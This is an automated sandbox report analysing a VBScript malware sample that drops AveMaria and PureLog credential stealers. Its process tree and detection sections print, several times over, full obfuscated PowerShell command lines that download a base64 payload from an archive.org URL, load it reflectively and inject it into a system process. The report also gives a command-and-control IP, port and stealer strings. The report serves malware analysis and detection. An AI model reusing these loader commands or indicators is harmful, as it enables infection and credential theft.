Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
89SkYNNpdi.vbs

Overview

General Information

Sample name:89SkYNNpdi.vbs
renamed because original name is a hash value
Original sample name:3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b.vbs
Analysis ID:1523823
MD5:8826da2dae531f219269ca314cec4f88
SHA1:a5c24e29d2b9901a0849fe4c70dd67733febcb57
SHA256:3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

AveMaria, PrivateLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AveMaria stealer
Yara detected PrivateLoader
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 6992 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
{"C2 url": "109.248.151.156", "port": 2048, "Proxy Port": 5000, "Builder Id": "D6PX8E9W60"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
      • 0xfd20:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0xe608:$a2: SMTP Password
      • 0xd848:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0xfba8:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0xe038:$a6: \Torch\User Data\Default\Login Data
      • 0xeba4:$a8: "os_crypt":{"encrypted_key":"
      • 0xe4d0:$a10: \logins.json
      • 0xeb1c:$a11: Accounts\Account.rec0
      • 0xf948:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          4.2.powershell.exe.1b2b2de3860.4.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
            4.2.powershell.exe.1b2b2de3860.4.unpackAveMaria_WarZoneunknownunknown
            • 0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
            • 0x16a74:$str2: MsgBox.exe
            • 0x16948:$str6: Ave_Maria
            • 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            • 0x15608:$str8: SMTP Password
            • 0x15fc0:$str12: \sqlmap.dll
            4.2.powershell.exe.1b2b2de3860.4.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOMDetects executables embedding command execution via IExecuteCommand COM objectditekSHen
            • 0x16f89:$r1: Classes\Folder\shell\open\command
            • 0x16fac:$k1: DelegateExecute
            4.2.powershell.exe.1b2b2de3860.4.unpackMALWARE_Win_WarzoneRATDetects AveMaria/WarzoneRATditekSHen
            • 0x16554:$s1: RDPClip
            • 0x17358:$s2: Grabber
            • 0x16948:$s3: Ave_Maria Stealer OpenSource
            • 0x16a48:$s4: \MidgetPorn\workspace\MsgBox.exe
            • 0x1677e:$s5: @\cmd.exe
            5.2.AddInProcess32.exe.400000.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 24 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAy
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gW
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAy
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs", ProcessId: 7540, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ